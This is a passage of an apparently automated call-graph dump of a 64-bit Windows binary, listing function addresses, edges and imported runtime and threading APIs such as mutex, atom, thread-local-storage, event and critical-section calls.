16450->16331 16451->16448 16451->16450 16455 7ff6935d33f0 16452->16455 16454 7ff6935f1afe 16456 7ff6935d39b0 16455->16456 16457 7ff6935d340d 16455->16457 16456->16454 16458 7ff6935d3420 16457->16458 16565 7ff6935d6420 GetCurrentProcessId 16457->16565 16459 7ff6935d342b 16458->16459 16460 7ff6935d36d5 16458->16460 16585 7ff6935d7890 16459->16585 16462 7ff6935d7890 101 API calls 16460->16462 16465 7ff6935d343b 16462->16465 16464 7ff6935d36bd 16464->16459 16466 7ff6935d36cb 16464->16466 16467 7ff6935d6420 17 API calls 16465->16467 16478 7ff6935d3447 16465->16478 16466->16460 16468 7ff6935d6420 17 API calls 16466->16468 16469 7ff6935d36f2 16467->16469 16468->16460 16470 7ff6935d6420 17 API calls 16469->16470 16471 7ff6935d3818 16469->16471 16469->16478 16470->16478 16473 7ff6935d6420 17 API calls 16471->16473 16474 7ff6935d3939 16471->16474 16497 7ff6935d383b 16471->16497 16472 7ff6935d6420 17 API calls 16499 7ff6935d369f 16472->16499 16473->16474 16477 7ff6935d6420 17 API calls 16474->16477 16518 7ff6935d363c 16474->16518 16542 7ff6935d3685 16474->16542 16475 7ff6935d6420 17 API calls 16475->16478 16476 7ff6935d6420 17 API calls 16476->16518 16480 7ff6935d38dc 16477->16480 16478->16471 16478->16475 16515 7ff6935d34c0 16478->16515 16479 7ff6935d3528 16482 7ff6935d6420 17 API calls 16479->16482 16512 7ff6935d3531 16479->16512 16483 7ff6935d6420 17 API calls 16480->16483 16480->16497 16481 7ff6935d6420 17 API calls 16481->16542 16487 7ff6935d3b2a 16482->16487 16489 7ff6935d3e79 16483->16489 16484 7ff6935d398b 16484->16474 16490 7ff6935d3996 16484->16490 16485 7ff6935d3890 16485->16480 16492 7ff6935d3897 16485->16492 16486 7ff6935d6420 17 API calls 16491 7ff6935d388b 16486->16491 16501 7ff6935d6420 17 API calls 16487->16501 16487->16512 16489->16497 16502 7ff6935d6420 17 API calls 16489->16502 16495 7ff6935d77d0 93 API calls 16490->16495 16604 7ff6935d77d0 16491->16604 16500 7ff6935d6420 17 API calls 16492->16500 16492->16518 16493 7ff6935d38cb 16493->16454 16494 7ff6935d6420 17 API calls 16494->16512 16495->16493 16496 7ff6935d357b 16505 7ff6935d6420 17 API calls 16496->16505 16522 7ff6935d35a9 16496->16522 16497->16476 16497->16518 16497->16542 16498 7ff6935d6420 17 API calls 16506 7ff6935d3871 16498->16506 16499->16491 16499->16498 16503 7ff6935d3e13 16500->16503 16501->16512 16502->16497 16507 7ff6935d3e24 16503->16507 16503->16518 16504 7ff6935d6420 17 API calls 16504->16515 16510 7ff6935d3d61 16505->16510 16506->16486 16506->16491 16507->16499 16514 7ff6935d6420 17 API calls 16507->16514 16508 7ff6935d3edd 16508->16484 16513 7ff6935d6420 17 API calls 16508->16513 16509 7ff6935d35b8 realloc 16509->16508 16511 7ff6935d35cf 16509->16511 16510->16518 16519 7ff6935d6420 17 API calls 16510->16519 16510->16522 16516 7ff6935d6420 17 API calls 16511->16516 16523 7ff6935d35d8 16511->16523 16512->16484 16512->16494 16512->16496 16512->16508 16512->16518 16530 7ff6935d3c01 16512->16530 16517 7ff6935d3eee 16513->16517 16514->16499 16515->16479 16515->16485 16515->16504 16520 7ff6935d3d9a 16516->16520 16517->16474 16521 7ff6935d3eff 16517->16521 16518->16481 16518->16499 16518->16506 16518->16542 16519->16522 16520->16518 16520->16523 16526 7ff6935d6420 17 API calls 16520->16526 16521->16490 16524 7ff6935d6420 17 API calls 16521->16524 16522->16509 16522->16518 16523->16518 16525 7ff6935d3605 memset 16523->16525 16524->16490 16527 7ff6935d361e 16525->16527 16528 7ff6935d3d31 16525->16528 16529 7ff6935d3db6 16526->16529 16527->16518 16535 7ff6935d6420 17 API calls 16527->16535 16531 7ff6935d6420 17 API calls 16528->16531 16529->16523 16534 7ff6935d6420 17 API calls 16529->16534 16532 7ff6935d6420 17 API calls 16530->16532 16533 7ff6935d3d36 16531->16533 16532->16496 16533->16518 16533->16527 16538 7ff6935d6420 17 API calls 16533->16538 16536 7ff6935d3dda 16534->16536 16537 7ff6935d3c17 16535->16537 16536->16518 16536->16523 16539 7ff6935d6420 17 API calls 16536->16539 16537->16518 16540 7ff6935d6420 17 API calls 16537->16540 16538->16527 16539->16523 16541 7ff6935d3c33 16540->16541 16541->16518 16543 7ff6935d6420 17 API calls 16541->16543 16542->16472 16542->16499 16544 7ff6935d3c4b 16543->16544 16544->16518 16545 7ff6935d6420 17 API calls 16544->16545 16546 7ff6935d3c6a 16545->16546 16546->16518 16547 7ff6935d6420 17 API calls 16546->16547 16548 7ff6935d3c89 16547->16548 16548->16518 16549 7ff6935d6420 17 API calls 16548->16549 16550 7ff6935d3ca8 16549->16550 16550->16518 16551 7ff6935d6420 17 API calls 16550->16551 16552 7ff6935d3cc4 16551->16552 16552->16518 16553 7ff6935d3cd5 16552->16553 16553->16542 16554 7ff6935d6420 17 API calls 16553->16554 16555 7ff6935d3ce3 16554->16555 16556 7ff6935d3ea4 16555->16556 16557 7ff6935d3cf8 16555->16557 16556->16499 16558 7ff6935d6420 17 API calls 16556->16558 16557->16542 16559 7ff6935d6420 17 API calls 16557->16559 16560 7ff6935d3eb2 16558->16560 16561 7ff6935d3d06 16559->16561 16560->16499 16563 7ff6935d6420 17 API calls 16560->16563 16561->16542 16562 7ff6935d3d17 16561->16562 16562->16499 16564 7ff6935d6420 17 API calls 16562->16564 16563->16499 16564->16499 16566 7ff6935d6443 CreateMutexA WaitForSingleObject 16565->16566 16568 7ff6935d6696 16566->16568 16569 7ff6935d6556 FindAtomA 16566->16569 16570 7ff6935d62a0 6 API calls 16568->16570 16571 7ff6935d65e1 GetAtomNameA 16569->16571 16572 7ff6935d6568 AddAtomA 16569->16572 16573 7ff6935d66a2 CloseHandle 16570->16573 16574 7ff6935d66b6 16571->16574 16582 7ff6935d6619 16571->16582 16577 7ff6935d6683 16572->16577 16578 7ff6935d65ac _onexit 16572->16578 16573->16464 16575 7ff6935d62a0 6 API calls 16574->16575 16575->16582 16615 7ff6935d62a0 GetLastError 16577->16615 16580 7ff6935d65bf ReleaseMutex CloseHandle 16578->16580 16581 7ff6935d65d8 16580->16581 16581->16464 16582->16580 16584 7ff6935d666e _onexit 16582->16584 16584->16580 16620 7ff6935d7140 16585->16620 16587 7ff6935d78a5 16588 7ff6935d78a9 16587->16588 16632 7ff6935cf8a0 16587->16632 16588->16465 16590 7ff6935d78d0 16591 7ff6935d790b 16590->16591 16592 7ff6935cf8a0 11 API calls 16590->16592 16650 7ff6935cfbc0 16591->16650 16594 7ff6935d78e3 16592->16594 16594->16591 16659 7ff6935d4820 16594->16659 16597 7ff6935d4820 54 API calls 16599 7ff6935d796f 16597->16599 16600 7ff6935d7998 16599->16600 16602 7ff6935d79c0 16599->16602 16662 7ff6935d8a60 16599->16662 16601 7ff6935d4820 54 API calls 16600->16601 16601->16591 16603 7ff6935d4820 54 API calls 16602->16603 16603->16591 17035 7ff6935d6b40 16604->17035 16606 7ff6935d77e3 16607 7ff6935d7860 16606->16607 16609 7ff6935cfbc0 3 API calls 16606->16609 16614 7ff6935d780f 16606->16614 16607->16493 16608 7ff6935cf8a0 11 API calls 16608->16614 16610 7ff6935d7803 16609->16610 16611 7ff6935cfbc0 3 API calls 16610->16611 16611->16614 16612 7ff6935cfbc0 malloc GetCurrentThreadId SetEvent 16612->16614 16614->16608 16614->16612 17045 7ff6935d87d0 16614->17045 16616 7ff6935d62c0 FormatMessageA 16615->16616 16619 7ff6935d62b4 16615->16619 16617 7ff6935d62f5 IsDebuggerPresent 16616->16617 16618 7ff6935d6308 OutputDebugStringA OutputDebugStringA LocalFree 16616->16618 16617->16619 16618->16617 16619->16581 16621 7ff6935d7155 16620->16621 16622 7ff6935d7220 16620->16622 16624 7ff6935d6420 17 API calls 16621->16624 16625 7ff6935d71b4 16621->16625 16628 7ff6935d7164 16621->16628 16684 7ff6935d6fd0 16622->16684 16626 7ff6935d71e5 16624->16626 16625->16587 16627 7ff6935d6420 17 API calls 16626->16627 16626->16628 16627->16628 16628->16625 16629 7ff6935d6420 17 API calls 16628->16629 16630 7ff6935d723d 16629->16630 16630->16625 16631 7ff6935d6420 17 API calls 16630->16631 16631->16625 16633 7ff6935cf900 16632->16633 16634 7ff6935cf8b7 16632->16634 16733 7ff6935cf820 malloc 16633->16733 16635 7ff6935cf910 16634->16635 16637 7ff6935cf8cb 16634->16637 16639 7ff6935cf970 GetCurrentThreadId 16634->16639 16640 7ff6935cf929 16634->16640 16635->16590 16641 7ff6935cf8d4 16637->16641 16642 7ff6935cf8e0 GetCurrentThreadId 16637->16642 16638 7ff6935cf908 16638->16634 16638->16635 16639->16640 16639->16641 16643 7ff6935cf931 16640->16643 16644 7ff6935cf9a8 CreateEventA 16640->16644 16641->16590 16642->16590 16643->16637 16649 7ff6935cf953 16643->16649 16735 7ff6935d6880 16643->16735 16645 7ff6935cf9e0 GetLastError 16644->16645 16646 7ff6935cf9c0 16644->16646 16646->16643 16647 7ff6935cf9cf CloseHandle 16646->16647 16647->16643 16649->16590 16651 7ff6935cfbf8 16650->16651 16654 7ff6935cfbd2 16650->16654 16652 7ff6935cf820 malloc 16651->16652 16655 7ff6935cfbfd 16652->16655 16653 7ff6935cfbde 16656 7ff6935cfbea 16653->16656 16657 7ff6935cfc58 SetEvent 16653->16657 16654->16653 16654->16656 16658 7ff6935cfc24 GetCurrentThreadId 16654->16658 16655->16654 16655->16656 16656->16591 16657->16656 16658->16653 16658->16656 16750 7ff6935d2100 16659->16750 16661 7ff6935d4829 16661->16597 16663 7ff6935d8a7b 16662->16663 16683 7ff6935d8b11 16662->16683 16664 7ff6935d8bd0 16663->16664 16672 7ff6935d8a96 16663->16672 16663->16683 16918 7ff6935d80b0 16664->16918 16667 7ff6935d8ac0 TryEnterCriticalSection 16668 7ff6935d8b28 LeaveCriticalSection 16667->16668 16667->16672 16669 7ff6935d7c40 5 API calls 16668->16669 16671 7ff6935d8b4c 16669->16671 16673 7ff6935d4820 54 API calls 16671->16673 16671->16683 16672->16667 16672->16683 16904 7ff6935d7c40 EnterCriticalSection 16672->16904 16910 7ff6935d93a0 Sleep 16672->16910 16911 7ff6935d84e0 EnterCriticalSection LeaveCriticalSection 16672->16911 16675 7ff6935d8b83 16673->16675 16676 7ff6935d4820 54 API calls 16675->16676 16677 7ff6935d8b93 16676->16677 16678 7ff6935cfbc0 3 API calls 16677->16678 16679 7ff6935d8ba6 16678->16679 16680 7ff6935d8bae 16679->16680 16681 7ff6935d84e0 93 API calls 16679->16681 16682 7ff6935d4820 54 API calls 16680->16682 16681->16680 16682->16683 16683->16599 16685 7ff6935d7048 16684->16685 16687 7ff6935d6fe9 16684->16687 16686 7ff6935d6420 17 API calls 16685->16686 16688 7ff6935d704d 16686->16688 16689 7ff6935d707b 16687->16689 16690 7ff6935d700d 16687->16690 16688->16687 16692 7ff6935d6420 17 API calls 16688->16692 16702 7ff6935d6ed0 16689->16702 16693 7ff6935d6420 17 API calls 16690->16693 16696 7ff6935d7019 16690->16696 16692->16687 16695 7ff6935d70f5 16693->16695 16695->16696 16700 7ff6935d6420 17 API calls 16695->16700 16696->16621 16697 7ff6935d6420 17 API calls 16698 7ff6935d70c5 16697->16698 16699 7ff6935d7090 16698->16699 16701 7ff6935d6420 17 API calls 16698->16701 16699->16621 16700->16696 16701->16699 16703 7ff6935d6ee9 calloc 16702->16703 16711 7ff6935d6f5e 16702->16711 16704 7ff6935d6f0b 16703->16704 16703->16711 16705 7ff6935d6f88 free 16704->16705 16706 7ff6935d6f80 16704->16706 16707 7ff6935d6f4b 16704->16707 16705->16711 16728 7ff6935cfd90 16706->16728 16716 7ff6935d7f60 16707->16716 16710 7ff6935d6f57 16710->16711 16712 7ff6935cfd90 2 API calls 16710->16712 16711->16697 16711->16699 16713 7ff6935d6fa8 16712->16713 16714 7ff6935cfd90 2 API calls 16713->16714 16715 7ff6935d6fb0 free 16714->16715 16715->16711 16717 7ff6935d7f74 16716->16717 16718 7ff6935d8090 16716->16718 16719 7ff6935d7f82 calloc 16717->16719 16720 7ff6935d803d 16717->16720 16718->16710 16719->16720 16721 7ff6935d7f9d CreateSemaphoreA CreateSemaphoreA 16719->16721 16720->16710 16722 7ff6935d805e 16721->16722 16723 7ff6935d7ffa 16721->16723 16726 7ff6935d8063 CloseHandle 16722->16726 16727 7ff6935d806c free 16722->16727 16724 7ff6935d7fff InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 16723->16724 16725 7ff6935d8050 CloseHandle 16723->16725 16724->16720 16725->16722 16726->16727 16727->16710 16729 7ff6935cfdc7 16728->16729 16730 7ff6935cfda8 16728->16730 16729->16705 16731 7ff6935cfdb2 CloseHandle 16730->16731 16732 7ff6935cfdb8 free 16730->16732 16731->16732 16732->16729 16734 7ff6935cf83e 16733->16734 16734->16638 16736 7ff6935d689f 16735->16736 16737 7ff6935d6900 WaitForSingleObject 16735->16737 16743 7ff6935d66d0 16736->16743 16737->16643 16739 7ff6935d68d9 WaitForSingleObject 16740 7ff6935d68e8 16739->16740 16742 7ff6935d68b0 16739->16742 16740->16643 16741 7ff6935d66d0 3 API calls 16741->16742 16742->16739 16742->16740 16742->16741 16744 7ff6935d6740 QueryPerformanceFrequency 16743->16744 16745 7ff6935d66e0 16743->16745 16744->16745 16748 7ff6935d6760 16744->16748 16746 7ff6935d66f4 GetTickCount 16745->16746 16747 7ff6935d66e5 QueryPerformanceCounter 16745->16747 16746->16742 16747->16746 16749 7ff6935d6708 16747->16749 16748->16746 16749->16742 16751 7ff6935d22f0 16750->16751 16759 7ff6935d211d 16750->16759 16752 7ff6935d6420 17 API calls 16751->16752 16754 7ff6935d22f5 16752->16754 16753 7ff6935d22e5 16753->16661 16757 7ff6935d6420 17 API calls 16754->16757 16754->16759 16756 7ff6935d2141 16758 7ff6935d2149 16756->16758 16762 7ff6935d6420 17 API calls 16756->16762 16757->16759 16760 7ff6935d21a0 TlsGetValue 16758->16760 16761 7ff6935d2150 TlsGetValue 16758->16761 16759->16753 16759->16756 16827 7ff6935d1710 16759->16827 16763 7ff6935d21b4 16760->16763 16764 7ff6935d216e 16760->16764 16761->16763 16761->16764 16765 7ff6935d2185 16762->16765 16787 7ff6935d1250 16763->16787 16764->16661 16765->16761 16766 7ff6935d218f 16765->16766 16766->16760 16769 7ff6935d6420 17 API calls 16766->16769 16771 7ff6935d2199 16769->16771 16770 7ff6935d21cb GetCurrentThreadId CreateEventA 16772 7ff6935d2203 16770->16772 16771->16760 16773 7ff6935d220c GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 16772->16773 16774 7ff6935d235d 16772->16774 16775 7ff6935d2270 GetThreadPriority 16773->16775 16776 7ff6935f1b26 abort 16773->16776 16835 7ff6935d15e0 GetCurrentThreadId _ultoa 16774->16835 16778 7ff6935d22a3 TlsSetValue 16775->16778 16779 7ff6935d2338 16775->16779 16785 7ff6935f1b2c 16776->16785 16778->16776 16784 7ff6935d22c1 16778->16784 16781 7ff6935d6420 17 API calls 16779->16781 16783 7ff6935d233d 16781->16783 16783->16778 16786 7ff6935d6420 17 API calls 16783->16786 16784->16661 16785->16785 16786->16778 16788 7ff6935d1390 16787->16788 16789 7ff6935d126c 16787->16789 16790 7ff6935d6420 17 API calls 16788->16790 16792 7ff6935cf8a0 11 API calls 16789->16792 16791 7ff6935d1395 16790->16791 16791->16789 16794 7ff6935d6420 17 API calls 16791->16794 16793 7ff6935d1287 16792->16793 16795 7ff6935d128f 16793->16795 16796 7ff6935d6420 17 API calls 16793->16796 16794->16789 16797 7ff6935d129a 16795->16797 16800 7ff6935d1305 16796->16800 16798 7ff6935d12b0 16797->16798 16799 7ff6935d132c calloc 16797->16799 16838 7ff6935d0770 16798->16838 16802 7ff6935d1343 16799->16802 16803 7ff6935d1354 16799->16803 16800->16797 16806 7ff6935d1314 16800->16806 16805 7ff6935d0770 20 API calls 16802->16805 16808 7ff6935d6420 17 API calls 16803->16808 16821 7ff6935d136a 16803->16821 16807 7ff6935d134b 16805->16807 16809 7ff6935d6420 17 API calls 16806->16809 16807->16803 16811 7ff6935d14f0 free 16807->16811 16808->16821 16809->16797 16810 7ff6935d12d8 16819 7ff6935d12e3 16810->16819 16811->16803 16812 7ff6935cfbc0 3 API calls 16817 7ff6935d12ec 16812->16817 16813 7ff6935d1380 16818 7ff6935d6420 17 API calls 16813->16818 16814 7ff6935d6420 17 API calls 16814->16821 16815 7ff6935d6420 17 API calls 16816 7ff6935d1425 16815->16816 16820 7ff6935d13c5 16816->16820 16822 7ff6935d12cc 16816->16822 16824 7ff6935d6420 17 API calls 16816->16824 16817->16764 16817->16770 16818->16819 16819->16812 16820->16822 16823 7ff6935d6420 17 API calls 16820->16823 16821->16810 16821->16813 16821->16819 16822->16810 16822->16814 16825 7ff6935d14ba 16823->16825 16824->16820 16825->16822 16826 7ff6935d6420 17 API calls 16825->16826 16826->16822 16866 7ff6935d02c0 16827->16866 16829 7ff6935d1722 16830 7ff6935cf8a0 11 API calls 16829->16830 16831 7ff6935d1731 16830->16831 16834 7ff6935d173c 16831->16834 16888 7ff6935d1520 16831->16888 16833 7ff6935cfbc0 3 API calls 16833->16834 16834->16833 16836 7ff6935d16ad OutputDebugStringA abort 16835->16836 16839 7ff6935d078a 16838->16839 16862 7ff6935d0cb1 16838->16862 16840 7ff6935d6420 17 API calls 16839->16840 16865 7ff6935d079d 16839->16865 16841 7ff6935d0fcc 16840->16841 16842 7ff6935d6420 17 API calls 16841->16842 16841->16865 16843 7ff6935d0fe8 16842->16843 16845 7ff6935d6420 17 API calls 16843->16845 16843->16865 16844 7ff6935d0df1 malloc 16844->16862 16844->16865 16846 7ff6935d1000 16845->16846 16848 7ff6935d6420 17 API calls 16846->16848 16846->16865 16847 7ff6935d0d30 realloc 16847->16862 16847->16865 16849 7ff6935d101c 16848->16849 16851 7ff6935d6420 17 API calls 16849->16851 16849->16865 16850 7ff6935cff20 17 API calls 16850->16865 16852 7ff6935d103a 16851->16852 16853 7ff6935d6420 17 API calls 16852->16853 16852->16865 16854 7ff6935d1056 16853->16854 16854->16844 16855 7ff6935d6420 17 API calls 16854->16855 16854->16865 16856 7ff6935d1075 16855->16856 16857 7ff6935d6420 17 API calls 16856->16857 16856->16862 16856->16865 16858 7ff6935d1091 16857->16858 16860 7ff6935d6420 17 API calls 16858->16860 16858->16865 16859 7ff6935d6420 17 API calls 16859->16865 16861 7ff6935d10b1 16860->16861 16861->16847 16863 7ff6935d6420 17 API calls 16861->16863 16861->16865 16862->16815 16862->16820 16862->16822 16863->16865 16864 7ff6935d0c0f memcpy 16864->16865 16865->16844 16865->16847 16865->16850 16865->16859 16865->16862 16865->16864 16867 7ff6935d03f0 16866->16867 16870 7ff6935d02de 16866->16870 16868 7ff6935d6420 17 API calls 16867->16868 16869 7ff6935d03f5 16868->16869 16869->16870 16872 7ff6935d6420 17 API calls 16869->16872 16871 7ff6935d030b 16870->16871 16873 7ff6935d6420 17 API calls 16870->16873 16875 7ff6935d0332 calloc 16871->16875 16884 7ff6935d0340 16871->16884 16872->16870 16874 7ff6935d03c5 16873->16874 16874->16871 16877 7ff6935d6420 17 API calls 16874->16877 16878 7ff6935d0494 16875->16878 16879 7ff6935d047e 16875->16879 16877->16871 16881 7ff6935d6420 17 API calls 16878->16881 16879->16884 16880 7ff6935d0365 16885 7ff6935d6420 17 API calls 16880->16885 16886 7ff6935d036f 16880->16886 16883 7ff6935d0499 16881->16883 16882 7ff6935d6420 17 API calls 16882->16880 16883->16879 16887 7ff6935d6420 17 API calls 16883->16887 16884->16880 16884->16882 16885->16886 16886->16829 16887->16879 16889 7ff6935d1535 TlsAlloc 16888->16889 16890 7ff6935d15b0 16888->16890 16894 7ff6935d1580 16889->16894 16895 7ff6935d155b 16889->16895 16891 7ff6935d6420 17 API calls 16890->16891 16893 7ff6935d15b5 16891->16893 16893->16889 16897 7ff6935d6420 17 API calls 16893->16897 16896 7ff6935d6420 17 API calls 16894->16896 16898 7ff6935f1b20 abort 16895->16898 16899 7ff6935d1579 16895->16899 16900 7ff6935d1585 16896->16900 16897->16889 16901 7ff6935f1b26 abort 16898->16901 16899->16834 16900->16895 16902 7ff6935d6420 17 API calls 16900->16902 16903 7ff6935f1b2c 16901->16903 16902->16895 16903->16903 16905 7ff6935d7c72 16904->16905 16906 7ff6935d7cb0 LeaveCriticalSection 16904->16906 16907 7ff6935d7c90 LeaveCriticalSection 16905->16907 16908 7ff6935d7c79 ReleaseSemaphore 16905->16908 16906->16672 16907->16672 16908->16907 16909 7ff6935d7cd0 LeaveCriticalSection 16908->16909 16909->16672 16910->16672 16912 7ff6935d8531 16911->16912 16913 7ff6935d8548 16911->16913 16912->16672 16930 7ff6935d81d0 16913->16930 16916 7ff6935d8563 LeaveCriticalSection 16916->16912 16917 7ff6935d8570 16917->16916 16919 7ff6935d8170 16918->16919 16923 7ff6935d80cf 16918->16923 16920 7ff6935d6420 17 API calls 16919->16920 16921 7ff6935d8175 16920->16921 16921->16923 16924 7ff6935d6420 17 API calls 16921->16924 16922 7ff6935d8107 16926 7ff6935d6420 17 API calls 16922->16926 16928 7ff6935d810f 16922->16928 16923->16922 16925 7ff6935d7f60 9 API calls 16923->16925 16924->16923 16925->16922 16927 7ff6935d8145 16926->16927 16927->16928 16929 7ff6935d6420 17 API calls 16927->16929 16928->16683 16929->16928 16931 7ff6935d8250 16930->16931 16932 7ff6935d81e8 16930->16932 16933 7ff6935d6880 5 API calls 16931->16933 16967 7ff6935d47e0 16932->16967 16935 7ff6935d8258 16933->16935 16937 7ff6935d841d WaitForSingleObject 16935->16937 16962 7ff6935d826e EnterCriticalSection 16935->16962 16937->16962 16965 7ff6935d8326 16937->16965 16938 7ff6935d82e0 16944 7ff6935d8338 16938->16944 16958 7ff6935d82eb 16938->16958 16940 7ff6935d6880 5 API calls 16940->16944 16941 7ff6935d6880 5 API calls 16941->16958 16942 7ff6935d8298 16948 7ff6935d82ba 16942->16948 16949 7ff6935d82a9 WaitForSingleObject 16942->16949 16943 7ff6935d83d0 16945 7ff6935d4ad0 54 API calls 16943->16945 16944->16940 16944->16943 16946 7ff6935d8360 16944->16946 16950 7ff6935d4ad0 54 API calls 16944->16950 16956 7ff6935d836d 16944->16956 16952 7ff6935d83d5 16945->16952 16957 7ff6935d4ad0 54 API calls 16946->16957 16946->16962 16947 7ff6935d8314 16964 7ff6935d4ad0 54 API calls 16947->16964 16947->16965 16948->16962 17019 7ff6935d4ad0 16948->17019 16949->16948 16949->16962 16950->16944 16951 7ff6935d8232 ResetEvent 16955 7ff6935d8205 16951->16955 16951->16956 16952->16956 16960 7ff6935d83dd WaitForSingleObject 16952->16960 16953 7ff6935d4ad0 54 API calls 16953->16958 16954 7ff6935d83a9 WaitForSingleObject 16954->16962 16954->16965 16955->16942 16955->16948 16955->16951 16955->16962 16955->16965 16970 7ff6935d6920 16955->16970 16978 7ff6935d4ca0 16955->16978 16956->16962 16963 7ff6935d4ca0 88 API calls 16956->16963 16957->16956 16958->16941 16958->16947 16958->16953 16958->16954 16958->16962 16958->16965 16960->16962 16962->16916 16962->16917 16963->16962 16964->16965 16965->16962 16966 7ff6935d4ca0 88 API calls 16965->16966 16966->16962 16968 7ff6935d2100 54 API calls 16967->16968 16969 7ff6935d47e9 16968->16969 16969->16938 16969->16955 16971 7ff6935d69b8 WaitForMultipleObjects 16970->16971 16972 7ff6935d6949 16970->16972 16974 7ff6935d69a0 16971->16974 16973 7ff6935d66d0 3 API calls 16972->16973 16977 7ff6935d695e 16973->16977 16974->16955 16975 7ff6935d698b WaitForMultipleObjects 16975->16974 16975->16977 16976 7ff6935d66d0 3 API calls 16976->16977 16977->16974 16977->16975 16977->16976 16979 7ff6935d2100 54 API calls 16978->16979 16980 7ff6935d4cad 16979->16980 16981 7ff6935d4cca 16980->16981 16982 7ff6935d6420 17 API calls 16980->16982 16986 7ff6935d4d00 16980->16986 16984 7ff6935cf8a0 11 API calls 16981->16984 16981->16986 16983 7ff6935d4d25 16982->16983 16983->16981 16985 7ff6935d6420 17 API calls 16983->16985 16987 7ff6935d4ce9 16984->16987 16985->16981 16986->16955 16987->16986 16988 7ff6935d4d64 ResetEvent 16987->16988 16989 7ff6935d4d6a 16987->16989 16988->16989 16990 7ff6935cfbc0 3 API calls 16989->16990 16991 7ff6935d4d72 16990->16991 17027 7ff6935d4ba0 16991->17027 17020 7ff6935d4b20 17019->17020 17023 7ff6935d4ae4 17019->17023 17021 7ff6935d6420 17 API calls 17020->17021 17022 7ff6935d4b25 17021->17022 17022->17023 17026 7ff6935d6420 17 API calls 17022->17026 17024 7ff6935d4b04 17023->17024 17025 7ff6935d2100 54 API calls 17023->17025 17024->16962 17025->17024 17026->17023 17028 7ff6935d2100 54 API calls 17027->17028 17029 7ff6935d4bab 17028->17029 17030 7ff6935d4b60 54 API calls 17029->17030 17032 7ff6935d4bc5 17030->17032 17031 7ff6935d6420 17 API calls 17031->17032 17032->17031 17033 7ff6935d4b60 54 API calls 17032->17033 17034 7ff6935d4920 93 API calls 17032->17034 17033->17032 17034->17032 17036 7ff6935d6be0 17035->17036 17040 7ff6935d6b5e 17035->17040 17037 7ff6935d6420 17 API calls 17036->17037 17038 7ff6935d6be5 17037->17038 17039 7ff6935d6420 17 API calls 17038->17039 17038->17040 17039->17040 17041 7ff6935d6420 17 API calls 17040->17041 17043 7ff6935d6bb9 17040->17043 17042 7ff6935d6c2d 17041->17042 17042->17043 17044 7ff6935d6420 17 API calls 17042->17044 17043->16606 17044->17043 17046 7ff6935d87e0 17045->17046 17047 7ff6935d8803 17045->17047 17046->17047 17048 7ff6935d8810 EnterCriticalSection 17046->17048 17047->16614 17049 7ff6935d8824 17048->17049 17050 7ff6935d8878 17048->17050 17051 7ff6935d8900 LeaveCriticalSection 17049->17051 17056 7ff6935d882f LeaveCriticalSection 17049->17056 17052 7ff6935d88e0 LeaveCriticalSection 17050->17052 17054 7ff6935d84e0 89 API calls 17050->17054 17051->17047 17052->17047 17055 7ff6935d88a7 17054->17055 17055->17052 17055->17056 17056->17047 17058 7ff6935c1630 17057->17058 17067 7ff6935c2a5a 17057->17067 17069 7ff6935cf5f0 17058->17069 17059 7ff6935c2bfe _stricmp 17059->17067 17060 7ff6935c2b14 _stricmp 17060->17067 17061 7ff6935cf5f0 74 API calls 17061->17067 17062 7ff6935c2e08 strcmp 17062->17067 17063 7ff6935c2eba strcmp 17063->17067 17064 7ff6935c2f61 strcmp 17064->17067 17065 7ff6935c3011 strcmp 17065->17067 17066 7ff6935c30b4 strcmp 17066->17067 17067->17058 17067->17059 17067->17060 17067->17061 17067->17062 17067->17063 17067->17064 17067->17065 17067->17066 17067->17067 17068 7ff6935c3134 strcmp 17067->17068 17068->17067 17070 7ff6935cf606 17069->17070 17071 7ff6935cf648 17069->17071 17185 7ff6935d4620 GetLastError 17070->17185 17163 7ff6935d32c0 17071->17163 17074 7ff6935cf611 17076 7ff6935cf688 calloc 17074->17076 17077 7ff6935cf619 17074->17077 17075 7ff6935cf65b 17078 7ff6935cf8a0 11 API calls 17075->17078 17082 7ff6935cf7ea abort 17076->17082 17083 7ff6935cf6a6 17076->17083 17079 7ff6935cf625 17077->17079 17080 7ff6935cf730 realloc 17077->17080 17081 7ff6935cf667 17078->17081 17084 7ff6935cf6bb 17079->17084 17085 7ff6935cf637 17079->17085 17080->17082 17086 7ff6935cf75b memset 17080->17086 17087 7ff6935cf7b8 17081->17087 17092 7ff6935cfbc0 3 API calls 17081->17092 17095 7ff6935cf7f5 17082->17095 17189 7ff6935d4690 GetLastError 17083->17189 17084->17085 17089 7ff6935cf790 malloc 17084->17089 17090 7ff6935cf6e1 malloc 17084->17090 17085->16354 17091 7ff6935d4690 59 API calls 17086->17091 17093 7ff6935cf7d8 memset 17087->17093 17089->17082 17094 7ff6935cf6f3 17089->17094 17090->17082 17090->17094 17096 7ff6935cf783 17091->17096 17092->17070 17097 7ff6935cf715 17093->17097 17094->17093 17099 7ff6935cf70a memcpy 17094->17099 17095->16354 17096->17089 17097->16354 17099->17097 17101 7ff6935cf5f0 74 API calls 17100->17101 17102 7ff6935c2296 17101->17102 17103 7ff6935cf5f0 74 API calls 17102->17103 17104 7ff6935c22a5 17103->17104 17105 7ff6935cf5f0 74 API calls 17104->17105 17106 7ff6935c23c0 17105->17106 17107 7ff6935cf5f0 74 API calls 17106->17107 17108 7ff6935c23cf 17107->17108 17108->17108 17212 7ff6935c2120 17108->17212 17110 7ff6935c24d3 17111 7ff6935c3c40 141 API calls 17110->17111 17112 7ff6935c24e0 17111->17112 17113 7ff6935c2501 wcslen 17112->17113 17131 7ff6935c24f2 17112->17131 17114 7ff6935c2531 17113->17114 17115 7ff6935c265d 17113->17115 17117 7ff6935c2548 memcpy 17114->17117 17118 7ff6935c255d 17114->17118 17129 7ff6935c262a 17114->17129 17218 7ff6935ef1e0 17115->17218 17117->17118 17119 7ff6935cf5f0 74 API calls 17118->17119 17120 7ff6935c2596 17119->17120 17122 7ff6935cf5f0 74 API calls 17120->17122 17121 7ff6935cf5f0 74 API calls 17123 7ff6935c26bd 17121->17123 17124 7ff6935c25a5 17122->17124 17125 7ff6935cf5f0 74 API calls 17123->17125 17127 7ff6935c2611 wcslen 17124->17127 17126 7ff6935c26cc 17125->17126 17128 7ff6935c2737 wcslen 17126->17128 17127->17129 17130 7ff6935c2750 17128->17130 17129->17121 17129->17131 17130->17131 17132 7ff6935cf5f0 74 API calls 17130->17132 17131->16369 17133 7ff6935c2766 17132->17133 17134 7ff6935cf5f0 74 API calls 17133->17134 17135 7ff6935c2775 17134->17135 17136 7ff6935c27ca wcslen 17135->17136 17137 